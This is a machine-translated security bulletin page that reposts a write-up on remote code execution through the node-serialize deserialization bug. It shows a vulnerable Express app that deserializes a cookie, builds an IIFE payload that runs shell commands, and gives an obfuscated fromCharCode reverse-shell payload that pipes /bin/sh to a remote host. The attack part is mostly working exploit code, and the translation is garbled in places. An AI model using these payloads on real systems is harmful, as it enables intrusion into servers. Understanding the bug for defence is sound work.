The use of the Node. js deserialization vulnerability remote code execution-vulnerability warning-the black bar safety net

ID MYHACK58:62201783324
Type myhack58
Reporter 翻译
Modified 2017-02-11T00:00:00


Vulnerability description

Vulnerability name: Exploiting Node.js deserialization bug for Remote Code Execution

Vulnerability CVE id: CVE-2017-594

Vulnerability type: code execution

Vulnerability description:

Untrusted data is passed into the unserialize()function, which leads to we can By pass with a immediately invoked function expression IIFE of JavaScript objects to implement arbitrary code execution.

Vulnerability details

In the Node. the js code during the review, I happened to see a serialization/deserialization module named node-serialize it. the cookie value from the request is then passed to the module to provide the unserialize()function. The following is an example of a node. js application:

var express = require('express'); var cookieParser = require('cookie-parser'); var escape = require('escape-html'); var serialize = require('node-serialize'); var app = express(); app. use(cookieParser()) app. get('/', function(req, res){ if (req. cookies. profile) { var str = new Buffer(req. cookies. profile,'base64'). toStrin(); var obj = serialize. unserialize(str); if (obj. username){ res. send("Hello" + escape(obj. username)); } }else{ res. cookie('profile',"eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3Vudhj5ijoiaw5kaweilcjjaxr5ijo iYmFuZ2Fsb3JlIn0=",{ maxAge: 900000, httpOnly: true}); } res. send("Hello World"); }); app. listen(3000);

Java, PHP, Ruby and Python also has a lot of deserialization problem

Understanding PHP Object Injection

Java Deserialization Cheat Sheet

Rails Remote Code Execution Vulnerability Explained

Arbitrary code execution with Python pickles

But I can't find any explanation of anti-serialization/target resource to explain the Node. js injection BUG.

Building the Payload

I'm using node-serialize version 0.0.4 research, in order to successfully use when untrusted data is passed to the unserialize()function arbitrary code execution. Create the Payload of the best method is to use the same module of the serialize()function.

I created the following JavaScript object and pass it to the serialize()function.

var y = { rce : function(){ require('child_process'). exec('ls /', function(error, stdout, stderr) { console. log(stdout) }); }, } var serialize = require('node-serialize'); console. log("Serialized: \n" + serialize. serialize(y));

The output is as follows:


Now we have a serialized string through unserialize()function to deserialize, but the problem is that the code execution does not happen until you trigger the object corresponding to the rce property of the function. Then I came up with, we can use JavaScript's immediately invoked function expression IIFE to call the function. If we in the body of the function after the use of parentheses (), when the object is created, the function will be called. The way it works is similar to the C ++class constructor.


var y = { rce : function(){ require('child_process'). exec('ls /', function(error, stdout, stderr) { console. log(stdout) }); }(), } var serialize = require('node-serialize'); console. log("Serialized: \n" + serialize. serialize(y));

Get the following output


IIFE is working properly, but the serialization fails. So I tried to in the previous serialized string of the function body after the Add parentheses () to. And pass it to the unserialize()function, fortunately it succeeded. So we have the Exploit Payload:

{"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process'). exec('ls /', function(error, stdout, stderr) { console. log(stdout) });\n }()"}

Will pass it to the unserialize()function will cause code execution.

var serialize = require('node-serialize'); var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\'). exec(\'ls /\', function(error, stdout, stderr) { console. log(stdout) });}()"}'; serialize. unserialize(payload);



Now we know that we can use the node-serialize module in the unserialize()function. Let us now exploit the vulnerability by generating a reverse shell.

Further Exploitation

Web application vulnerability in Is it from the HTTP request reads the named profile of the cookie, the cookie value to perform base64 decoded, and passed to the unserialize()function. Since the cookie is untrusted input, an attacker can create a malicious Cookie value in order to exploit this vulnerability.

I use nodejsshell. py to generate a reverse shell payload.

$ python 1337 [+] LHOST = [+] LPORT = 1337 [+] Encoding eval(String. fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,10 5,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,3 2,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,11 5,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,50,55,46,48,46,48,46, 49,34,59,10,80,79,82,84,61,34,49,51,51,55,34,59,10,84,73,77,69,79,85,84,61,34,53,4 8,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103 ,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,6 1,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,11 0,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,3 2,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,1 14,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,3 2,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,8 4,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32 ,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,3 2,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79, 83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,3 2,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,1 04,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114 ,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32, 32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,11 6,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,11 6,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,1 15,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116, 41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,1 02,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,12 3,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68 ,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,3 2,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116, 46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40, 101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116, 40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,3 2,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))

[1] [2] next